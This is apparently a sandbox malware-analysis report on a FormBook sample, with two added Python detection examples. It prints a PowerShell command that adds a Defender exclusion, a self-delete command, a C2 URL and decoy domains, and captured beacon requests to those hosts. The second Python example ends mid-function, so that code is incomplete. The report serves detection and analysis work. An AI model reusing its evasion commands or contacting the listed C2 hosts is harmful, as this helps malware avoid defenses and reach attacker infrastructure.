
Windows Analysis Report
Pago pendiente.exe

Overview

General Information

Sample name: Pago pendiente.exe
Analysis ID: 1430321
MD5: 9a308e1ea62b7ede8876e433178957d1
SHA1: dac00f0068f3f97a71faf15577ce0c7d855ff691
SHA256: ae300b28b2240d11d01e9066a26a88349258d4016c41460604c9ff5bb64c9b6d
Tags: exe

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM3
Yara detected FormBook
.NET source code contains potential unpacker
.NET source code contains very large array initializations
Adds a directory exclusion to Windows Defender
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to detect virtualization through RDTSC time measurements
Writes to foreign memory regions
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found decision node followed by non-executed suspicious APIs
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • Pago pendiente.exe (PID: 5824 cmdline: "C:\Users\user\Desktop\Pago pendiente.exe" MD5: 9A308E1EA62B7EDE8876E433178957D1)
    • powershell.exe (PID: 5080 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Pago pendiente.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 6428 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • RegSvcs.exe (PID: 5840 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
      • explorer.exe (PID: 1028 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)
        • control.exe (PID: 1644 cmdline: "C:\Windows\SysWOW64\control.exe" MD5: EBC29AA32C57A54018089CFC9CACAFE8)
          • cmd.exe (PID: 4832 cmdline: /c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 6360 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
Malware Configuration
{"C2 list": ["www.lolabeautystudios.com/gs12/"], "decoy": ["juniavilela.com", "italiahealth.club", "freefoodpro.com", "qqmotor.co", "mosahacatering.com", "wocc.club", "tourly360.com", "airzf.com", "eternalknot1008.com", "pons.cc", "zdryueva.com", "bodution.website", "vip8g100013.top", "3box.club", "bestoffersinoneplace.com", "tronbank.club", "hlysh.live", "allfireofferapp.sbs", "goldenvistaservices.com", "theconfidencebl-youprint.com", "doping.digital", "urxetqt.com", "utahdatecoach.com", "coworkingvalencia.pro", "thebeautybarandco.com", "umastyle.club", "demandstudiosnews.com", "k2securityhn.com", "teacakesandtadpoles.com", "epacksystems.network", "y2llvq.vip", "udin88b.us", "simonettipressurewashing.com", "baansbliss.com", "messyplayclub.com", "panaco.co", "kustomequipment.com", "actnowgreen.com", "tallawahyouthfoundation.com", "novistashop.com", "oversight418354.email", "ypsom.info", "enerableoffi.club", "otirugkyt.com", "mappedbyamanda.com", "vibelola.com", "nexelab.com", "zgcple.info", "maiores-veritatis.com", "wonderdread.cloud", "signomo.com", "uspsdirect.shop", "finessebuilding.com", "heavydutywearpart.com", "51win.ink", "b-a-s-e.net", "xianqianjin.fun", "domscott.art", "rtp-tambakslot5000.site", "sports565.com", "kpi-finder.com", "taylor.capital", "1993520.xyz", "hjgd.xyz"]}
Source | Rule | Description | Author | Strings
Source: 00000007.00000002.4443703751.0000000002C20000.00000040.10000000.00040000.00000000.sdmp
  Rule: JoeSecurity_FormBook | Description: Yara detected FormBook | Author: Joe Security
  Rule: JoeSecurity_FormBook_1 | Description: Yara detected FormBook | Author: Joe Security
  Rule: Windows_Trojan_Formbook_1112e116 | Description: unknown | Author: unknown
    • 0x6251:$a1: 3C 30 50 4F 53 54 74 09 40
    • 0x1cbc0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0xa9cf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    • 0x158b7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
  Rule: Formbook_1 | Description: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
    • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
  Rule: Formbook | Description: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
    • 0x18849:$sqlite3step: 68 34 1C 7B E1
    • 0x1895c:$sqlite3step: 68 34 1C 7B E1
    • 0x18878:$sqlite3text: 68 38 2A 90 C5
    • 0x1899d:$sqlite3text: 68 38 2A 90 C5
    • 0x1888b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x189b3:$sqlite3blob: 68 53 D8 7F 8C
  (30 entries in the full report; the remainder are not shown here)
Source | Rule | Description | Author | Strings
Source: 5.2.RegSvcs.exe.400000.0.unpack
  Rule: JoeSecurity_FormBook | Description: Yara detected FormBook | Author: Joe Security
  Rule: JoeSecurity_FormBook_1 | Description: Yara detected FormBook | Author: Joe Security
  Rule: Windows_Trojan_Formbook_1112e116 | Description: unknown | Author: unknown
    • 0x5451:$a1: 3C 30 50 4F 53 54 74 09 40
    • 0x1bdc0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x9bcf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    • 0x14ab7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
  Rule: Formbook_1 | Description: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
    • 0x8b08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8d82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x148b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x143a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x149b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x14b2f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x979a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1361c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa493:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1ab27:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1bb2a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
  Rule: Formbook | Description: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
    • 0x17a49:$sqlite3step: 68 34 1C 7B E1
    • 0x17b5c:$sqlite3step: 68 34 1C 7B E1
    • 0x17a78:$sqlite3text: 68 38 2A 90 C5
    • 0x17b9d:$sqlite3text: 68 38 2A 90 C5
    • 0x17a8b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x17bb3:$sqlite3blob: 68 53 D8 7F 8C
  (15 entries in the full report; the remainder are not shown here)

          System Summary

          barindex
          Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Pago pendiente.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Pago pendiente.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Pago pendiente.exe", ParentImage: C:\Users\user\Desktop\Pago pendiente.exe, ParentProcessId: 5824, ParentProcessName: Pago pendiente.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Pago pendiente.exe", ProcessId: 5080, ProcessName: powershell.exe
          Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Pago pendiente.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Pago pendiente.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Pago pendiente.exe", ParentImage: C:\Users\user\Desktop\Pago pendiente.exe, ParentProcessId: 5824, ParentProcessName: Pago pendiente.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Pago pendiente.exe", ProcessId: 5080, ProcessName: powershell.exe
          Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Pago pendiente.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Pago pendiente.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Pago pendiente.exe", ParentImage: C:\Users\user\Desktop\Pago pendiente.exe, ParentProcessId: 5824, ParentProcessName: Pago pendiente.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Pago pendiente.exe", ProcessId: 5080, ProcessName: powershell.exe
          No Snort rule has matched
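All three Sigma hits above fire on the same plaintext command line, in which the sample's own PID 5824 launches powershell.exe to add its Desktop path to Defender's exclusion list. The rule named "Powershell Base64 Encoded MpPreference Cmdlet" exists because the identical cmdlet is just as often passed through -EncodedCommand, which takes UTF-16LE. The following is an added example, not code from the report, from Joe Sandbox or from the Sigma project: it reimplements Sigma's base64offset trick in Python (three encodings of the needle, one per byte alignment, with the alignment-dependent edge characters stripped) and runs both the plaintext and the encoded check over constructed Sysmon-style process-creation events. The first event copies the report's PID 5080 command line; the dropper path in the second event and the benign third event are hypothetical.

```python
"""Flag Windows Defender exclusion changes in process-creation command lines.

Added example, not part of the Joe Sandbox report: a Python reimplementation
of the idea behind the Sigma hits (plain and base64-encoded MpPreference
cmdlets), run over constructed Sysmon-style events.
"""
import base64
import re

EXCLUSION_CMDLETS = ("Add-MpPreference", "Set-MpPreference")
EXCLUSION_PARAMS = ("-ExclusionPath", "-ExclusionProcess",
                    "-ExclusionExtension", "-ExclusionIpAddress")


def base64offset_variants(needle: bytes) -> list[str]:
    """The three base64 spellings of `needle` that can occur inside a base64
    blob whatever the needle's byte alignment (Sigma's base64offset modifier).
    Prefix 0, 1 or 2 pad bytes, encode, then drop the leading characters whose
    bits mix with the pad and the trailing characters whose bits mix with
    whatever follows the needle in the real blob."""
    starts = (0, 2, 3)        # leading chars spoiled by 0/1/2 pad bytes
    ends = (None, -3, -2)     # trailing chars spoiled, indexed by (len % 3)
    variants = []
    for pad in range(3):
        enc = base64.b64encode(b"\x00" * pad + needle)
        variants.append(enc[starts[pad]:ends[(len(needle) + pad) % 3]].decode("ascii"))
    return variants


def alignment_check(needle: bytes, text: bytes) -> bool:
    """True if some variant of `needle` is found in base64(text) for every
    byte alignment; `text` must contain `needle`. Used as a self-test."""
    variants = base64offset_variants(needle)
    return all(
        any(v in base64.b64encode(b"X" * pad + text).decode("ascii") for v in variants)
        for pad in range(3)
    )


def build_encoded_indicators() -> dict[str, str]:
    """Map base64 fragments to the cmdlet they encode. PowerShell's
    -EncodedCommand takes UTF-16LE, so both byte encodings are generated;
    only the two common casings of each cmdlet are covered."""
    table = {}
    for cmdlet in EXCLUSION_CMDLETS:
        for spelling in (cmdlet, cmdlet.lower()):
            for codec in ("utf-8", "utf-16-le"):
                for frag in base64offset_variants(spelling.encode(codec)):
                    table[frag] = f"{cmdlet} ({codec})"
    return table


ENCODED_INDICATORS = build_encoded_indicators()
# powershell.exe accepts any unambiguous prefix of -EncodedCommand (-e, -enc, ...).
ENCODED_ARG_RE = re.compile(r"(?i)\s-e[a-z]*\s+([A-Za-z0-9+/]{16,}={0,2})")


def scan_command_line(cmdline: str) -> list[str]:
    """Reasons this command line looks like a Defender exclusion change."""
    reasons = []
    lowered = cmdline.lower()
    if (any(c.lower() in lowered for c in EXCLUSION_CMDLETS)
            and any(p.lower() in lowered for p in EXCLUSION_PARAMS)):
        reasons.append("plaintext exclusion cmdlet")
    for match in ENCODED_ARG_RE.finditer(cmdline):
        blob = match.group(1)
        for frag, label in ENCODED_INDICATORS.items():
            if frag in blob:
                reasons.append(f"encoded MpPreference cmdlet: {label}")
                break
    return reasons


def encoded_command(script: str) -> str:
    """Encode a script the way `powershell -EncodedCommand` expects it."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed events. The first copies the report's PID 5080 command line;
# the dropper path in the second and the benign third event are hypothetical.
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Users\user\Desktop\Pago pendiente.exe",
     "Image": r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" '
                    r'Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Pago pendiente.exe"'},
    {"ParentImage": r"C:\Users\user\AppData\Local\Temp\dropper.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -nop -w hidden -enc "
                    + encoded_command(r"Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming'")},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe Get-MpPreference"},
]


def scan_events(events=SAMPLE_EVENTS) -> list[tuple[str, str, list[str]]]:
    """Return (parent, image, reasons) for every event that triggers."""
    hits = []
    for event in events:
        reasons = scan_command_line(event["CommandLine"])
        if reasons:
            hits.append((event["ParentImage"], event["Image"], reasons))
    return hits


if __name__ == "__main__":
    for parent, image, reasons in scan_events():
        print(f"{parent} -> {image}: {', '.join(reasons)}")
```

The plaintext check alone catches the report's exact command line, which is the cheap win: a powershell.exe whose parent is an unsigned executable on the Desktop has no business adding that same path to the exclusion list. The encoded table carries UTF-16LE variants because a detector that only encodes the UTF-8 needle misses the -EncodedCommand form entirely. On a host suspected of having run this sample, the existing exclusions can be listed with Get-MpPreference (the ExclusionPath, ExclusionProcess and ExclusionExtension properties) and compared against what the sandbox shows being added.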


          AV Detection

          barindex
          Source: http://www.urxetqt.com/gs12/www.hjgd.xyzAvira URL Cloud: Label: phishing
          Source: http://www.urxetqt.comAvira URL Cloud: Label: phishing
          Source: http://www.urxetqt.com/gs12/Avira URL Cloud: Label: phishing
          Source: 00000007.00000002.4443703751.0000000002C20000.00000040.10000000.00040000.00000000.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.lolabeautystudios.com/gs12/"], "decoy": ["juniavilela.com", "italiahealth.club", "freefoodpro.com", "qqmotor.co", "mosahacatering.com", "wocc.club", "tourly360.com", "airzf.com", "eternalknot1008.com", "pons.cc", "zdryueva.com", "bodution.website", "vip8g100013.top", "3box.club", "bestoffersinoneplace.com", "tronbank.club", "hlysh.live", "allfireofferapp.sbs", "goldenvistaservices.com", "theconfidencebl-youprint.com", "doping.digital", "urxetqt.com", "utahdatecoach.com", "coworkingvalencia.pro", "thebeautybarandco.com", "umastyle.club", "demandstudiosnews.com", "k2securityhn.com", "teacakesandtadpoles.com", "epacksystems.network", "y2llvq.vip", "udin88b.us", "simonettipressurewashing.com", "baansbliss.com", "messyplayclub.com", "panaco.co", "kustomequipment.com", "actnowgreen.com", "tallawahyouthfoundation.com", "novistashop.com", "oversight418354.email", "ypsom.info", "enerableoffi.club", "otirugkyt.com", "mappedbyamanda.com", "vibelola.com", "nexelab.com", "zgcple.info", "maiores-veritatis.com", "wonderdread.cloud", "signomo.com", "uspsdirect.shop", "finessebuilding.com", "heavydutywearpart.com", "51win.ink", "b-a-s-e.net", "xianqianjin.fun", "domscott.art", "rtp-tambakslot5000.site", "sports565.com", "kpi-finder.com", "taylor.capital", "1993520.xyz", "hjgd.xyz"]}
          Source: Pago pendiente.exeReversingLabs: Detection: 23%
          Source: Yara matchFile source: 5.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.Pago pendiente.exe.4f1f2f8.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.Pago pendiente.exe.4eaf4d8.9.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000007.00000002.4443703751.0000000002C20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.4443748619.0000000002C50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2071471834.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.2011441165.0000000004DCF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.2011441165.00000000044AE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.4443338371.00000000025A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Pago pendiente.exeJoe Sandbox ML: detected
          Source: Pago pendiente.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: Pago pendiente.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: Binary string: RegSvcs.pdb, source: explorer.exe, 00000006.00000002.4459657953.0000000010E7F000.00000004.80000000.00040000.00000000.sdmp, control.exe, 00000007.00000002.4444528823.0000000004CFF000.00000004.10000000.00040000.00000000.sdmp, control.exe, 00000007.00000002.4443405031.000000000282B000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: control.pdb source: RegSvcs.exe, 00000005.00000002.2072131724.0000000000FA7000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000005.00000002.2072038092.0000000000F00000.00000040.10000000.00040000.00000000.sdmp, control.exe, control.exe, 00000007.00000002.4443192720.0000000000060000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: wntdll.pdbUGP source: RegSvcs.exe, 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, control.exe, 00000007.00000002.4443991237.00000000047B0000.00000040.00001000.00020000.00000000.sdmp, control.exe, 00000007.00000003.2075562332.00000000045FF000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000007.00000002.4443991237.000000000494E000.00000040.00001000.00020000.00000000.sdmp, control.exe, 00000007.00000003.2072079557.000000000444B000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: RegSvcs.exe, RegSvcs.exe, 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, control.exe, control.exe, 00000007.00000002.4443991237.00000000047B0000.00000040.00001000.00020000.00000000.sdmp, control.exe, 00000007.00000003.2075562332.00000000045FF000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000007.00000002.4443991237.000000000494E000.00000040.00001000.00020000.00000000.sdmp, control.exe, 00000007.00000003.2072079557.000000000444B000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: control.pdbUGP source: RegSvcs.exe, 00000005.00000002.2072131724.0000000000FA7000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000005.00000002.2072038092.0000000000F00000.00000040.10000000.00040000.00000000.sdmp, control.exe, 00000007.00000002.4443192720.0000000000060000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: RegSvcs.pdb source: explorer.exe, 00000006.00000002.4459657953.0000000010E7F000.00000004.80000000.00040000.00000000.sdmp, control.exe, 00000007.00000002.4444528823.0000000004CFF000.00000004.10000000.00040000.00000000.sdmp, control.exe, 00000007.00000002.4443405031.000000000282B000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then pop esi (5_2_00417322)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then pop edi (5_2_00416CF0)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then pop edi (5_2_00417D70)
Source: C:\Windows\SysWOW64\control.exe Code function: 4x nop then pop esi (7_2_025B7322)
Source: C:\Windows\SysWOW64\control.exe Code function: 4x nop then pop edi (7_2_025B6CF0)
Source: C:\Windows\SysWOW64\control.exe Code function: 4x nop then pop edi (7_2_025B7D70)

          Networking

          barindex
Source: C:\Windows\explorer.exe Network Connect: 103.224.212.216 80
Source: C:\Windows\explorer.exe Network Connect: 3.33.130.190 80
          Source: Malware configuration extractorURLs: www.lolabeautystudios.com/gs12/
          Source: global trafficHTTP traffic detected: GET /gs12/?4h0=l5+ohMyXvfUY1BXURi/VBBPK89EwzQ1xmTW49ppdAXwminvYBxYYysXiCF4Xd1c73Byq&vT=LtxxLba HTTP/1.1Host: www.tronbank.clubConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /gs12/?4h0=sKMZ9JWmyHzsFnuZp0fZtWbmtlVDzCM4ZbYLfRKv+HtPtGiIGUjdRyYwPYcfKf7QGcOF&vT=LtxxLba HTTP/1.1Host: www.signomo.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /gs12/?4h0=DR9+51q0CIrIDgcjStoZ4W0ewB14phJf97sbOZAiDLbqJph64OQ6FfPwpz0r/rXmCdIn&vT=LtxxLba HTTP/1.1Host: www.airzf.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /gs12/?4h0=q59tBajeIo68CyAO1CDG6iJlXnRVkR/RpgQvK7vE3BQj9j+5I7CNTMK9jJbO36qf2KSo&vT=LtxxLba HTTP/1.1Host: www.k2securityhn.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 3.33.130.190 3.33.130.190
          Source: Joe Sandbox ViewIP Address: 103.224.212.216 103.224.212.216
          Source: Joe Sandbox ViewASN Name: AMAZONEXPANSIONGB AMAZONEXPANSIONGB
          Source: Joe Sandbox ViewASN Name: TRELLIAN-AS-APTrellianPtyLimitedAU TRELLIAN-AS-APTrellianPtyLimitedAU
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1 (12 occurrences)
Source: C:\Windows\explorer.exe Code function 6_2_0E4CEF82: getaddrinfo, setsockopt, recv
          Source: unknownDNS traffic detected: queries for: www.tronbank.club
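The four captured requests share the configured C2 path /gs12/, carry no User-Agent header, and use two query parameters of which the first value differs per request while the second (vT=LtxxLba) is the same in all four. None of the four Host values is the configured C2 (www.lolabeautystudios.com); all four are in the decoy list. FormBook cycles through its decoy domains alongside the real C2, so for detection the decoy list is as useful an indicator as the C2 entry. The following is an added example and not code from the report, from FormBook or from Joe Sandbox: it parses each captured request and scores it against the extracted configuration. The C2 entry and the four requests are copied from the report; the decoy list is cut down to the hosts used here, and the benign request is constructed for contrast.

```python
"""Match captured HTTP requests against an extracted FormBook configuration.

Added example, not part of the Joe Sandbox report. Config entries and the
four GET requests are copied from the report (decoy list trimmed); the
parsing and scoring are this example's own.
"""
import json
from urllib.parse import urlsplit

# Copied from the report's extracted configuration, decoy list abbreviated.
CONFIG = json.loads("""{
  "C2 list": ["www.lolabeautystudios.com/gs12/"],
  "decoy": ["tronbank.club", "signomo.com", "airzf.com", "k2securityhn.com",
            "urxetqt.com", "hjgd.xyz", "51win.ink", "sports565.com"]
}""")

# The four GET requests the sandbox captured, copied from the report.
OBSERVED_REQUESTS = [
    "GET /gs12/?4h0=l5+ohMyXvfUY1BXURi/VBBPK89EwzQ1xmTW49ppdAXwminvYBxYYysXiCF4Xd1c73Byq&vT=LtxxLba HTTP/1.1\r\n"
    "Host: www.tronbank.club\r\nConnection: close\r\n\r\n",
    "GET /gs12/?4h0=sKMZ9JWmyHzsFnuZp0fZtWbmtlVDzCM4ZbYLfRKv+HtPtGiIGUjdRyYwPYcfKf7QGcOF&vT=LtxxLba HTTP/1.1\r\n"
    "Host: www.signomo.com\r\nConnection: close\r\n\r\n",
    "GET /gs12/?4h0=DR9+51q0CIrIDgcjStoZ4W0ewB14phJf97sbOZAiDLbqJph64OQ6FfPwpz0r/rXmCdIn&vT=LtxxLba HTTP/1.1\r\n"
    "Host: www.airzf.com\r\nConnection: close\r\n\r\n",
    "GET /gs12/?4h0=q59tBajeIo68CyAO1CDG6iJlXnRVkR/RpgQvK7vE3BQj9j+5I7CNTMK9jJbO36qf2KSo&vT=LtxxLba HTTP/1.1\r\n"
    "Host: www.k2securityhn.com\r\nConnection: close\r\n\r\n",
]
# Constructed benign request for contrast (not from the report).
BENIGN_REQUEST = ("GET /index.html HTTP/1.1\r\nHost: www.example.com\r\n"
                  "User-Agent: Mozilla/5.0\r\nConnection: close\r\n\r\n")


def normalize_host(host: str) -> str:
    """The config stores bare domains; the Host header carries a www. prefix."""
    host = host.strip().lower().split(":")[0]
    return host[4:] if host.startswith("www.") else host


def parse_request(raw: str) -> dict:
    """Minimal HTTP/1.1 request parser: request line plus headers. The query is
    split without percent-decoding because the value is base64-like and
    contains '+' and '/' that urllib's parse_qs would turn into spaces."""
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    parts = urlsplit(target)
    query = dict(kv.partition("=")[::2] for kv in parts.query.split("&") if kv)
    return {"method": method, "path": parts.path, "query": query, "headers": headers}


def c2_hosts_and_paths(config: dict) -> tuple[set, set]:
    """Split 'host/path/' C2 entries into comparable host and path sets."""
    hosts, paths = set(), set()
    for entry in config["C2 list"]:
        host, _, path = entry.partition("/")
        hosts.add(normalize_host(host))
        paths.add("/" + path)
    return hosts, paths


def classify(raw: str, config: dict = CONFIG) -> dict:
    """Score one request: host role, C2 path match, missing User-Agent."""
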